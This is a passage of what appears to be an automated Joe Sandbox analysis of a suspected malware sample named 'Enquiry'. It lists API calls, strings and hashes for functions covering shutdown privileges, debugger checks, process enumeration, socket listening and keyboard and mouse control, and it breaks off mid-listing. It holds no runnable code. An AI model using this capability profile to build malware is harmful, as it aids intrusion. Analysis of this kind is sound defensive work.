                            • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                            • String ID: :$\$\??\%s
                            • API String ID: 2192556992-3457252023
                            • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                            • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                            • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                            • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                            APIs
                            • GetLocalTime.KERNEL32(?), ref: 004722A2
                            • __swprintf.LIBCMT ref: 004722B9
                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                            • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                            • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                            • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                            • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                            • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                            • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: FolderPath$LocalTime__swprintf
                            • String ID: %.3d
                            • API String ID: 3337348382-986655627
                            • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                            • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                            • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                            • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                            • FindClose.KERNEL32(00000000), ref: 0044291C
                            • FindClose.KERNEL32(00000000), ref: 00442930
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                            • FindClose.KERNEL32(00000000), ref: 004429D4
                              • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                            • FindClose.KERNEL32(00000000), ref: 004429E2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                            • String ID: *.*
                            • API String ID: 2640511053-438819550
                            • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                            • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                            • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                            • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                            APIs
                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                            • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                            • GetLastError.KERNEL32 ref: 00433414
                            • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                            • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                            • String ID: SeShutdownPrivilege
                            • API String ID: 2938487562-3733053543
                            • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                            • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                            • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                            • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                            APIs
                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                              • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                              • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                            • GetLengthSid.ADVAPI32(?), ref: 004461D0
                            • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                            • GetLengthSid.ADVAPI32(?), ref: 00446241
                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                            • CopySid.ADVAPI32(00000000), ref: 00446271
                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                            • String ID:
                            • API String ID: 1255039815-0
                            • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                            • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                            • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                            • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                            APIs
                            • __swprintf.LIBCMT ref: 00433073
                            • __swprintf.LIBCMT ref: 00433085
                            • __wcsicoll.LIBCMT ref: 00433092
                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                            • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                            • LockResource.KERNEL32(00000000), ref: 004330CA
                            • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                            • LoadResource.KERNEL32(?,00000000), ref: 00433105
                            • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                            • LockResource.KERNEL32(?), ref: 00433120
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                            • String ID:
                            • API String ID: 1158019794-0
                            • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                            • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                            • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                            • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                            • String ID:
                            • API String ID: 1737998785-0
                            • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                            • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                            • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                            • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                            • GetLastError.KERNEL32 ref: 0045D6BF
                            • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Error$Mode$DiskFreeLastSpace
                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                            • API String ID: 4194297153-14809454
                            • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                            • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                            • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                            • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _memmove$_strncmp
                            • String ID: @oH$\$^$h
                            • API String ID: 2175499884-3701065813
                            • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                            • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                            • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                            • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                            APIs
                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                            • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                            • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                            • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                            • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                            • listen.WSOCK32(00000000,00000005), ref: 00465381
                            • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                            • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ErrorLast$closesocket$bindlistensocket
                            • String ID:
                            • API String ID: 540024437-0
                            • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                            • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                            • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                            • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID:
                            • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                            • API String ID: 0-2872873767
                            • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                            • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                            • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                            • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                            • __wsplitpath.LIBCMT ref: 00475644
                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                            • _wcscat.LIBCMT ref: 00475657
                            • __wcsicoll.LIBCMT ref: 0047567B
                            • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                            • CloseHandle.KERNEL32(00000000), ref: 004756BA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                            • String ID:
                            • API String ID: 2547909840-0
                            • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                            • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                            • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                            • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                            • Sleep.KERNEL32(0000000A), ref: 0045250B
                            • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                            • FindClose.KERNEL32(?), ref: 004525FF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                            • String ID: *.*$\VH
                            • API String ID: 2786137511-2657498754
                            • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                            • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                            • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                            • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                            APIs
                            • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                            • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                            • TerminateProcess.KERNEL32(00000000), ref: 00422004
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                            • String ID: pqI
                            • API String ID: 2579439406-2459173057
                            • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                            • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                            • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                            • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                            APIs
                            • __wcsicoll.LIBCMT ref: 00433349
                            • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                            • __wcsicoll.LIBCMT ref: 00433375
                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: __wcsicollmouse_event
                            • String ID: DOWN
                            • API String ID: 1033544147-711622031
                            • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                            • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                            • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                            • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                            APIs
                            • GetKeyboardState.USER32(?), ref: 0044C3D2
                            • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                            • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
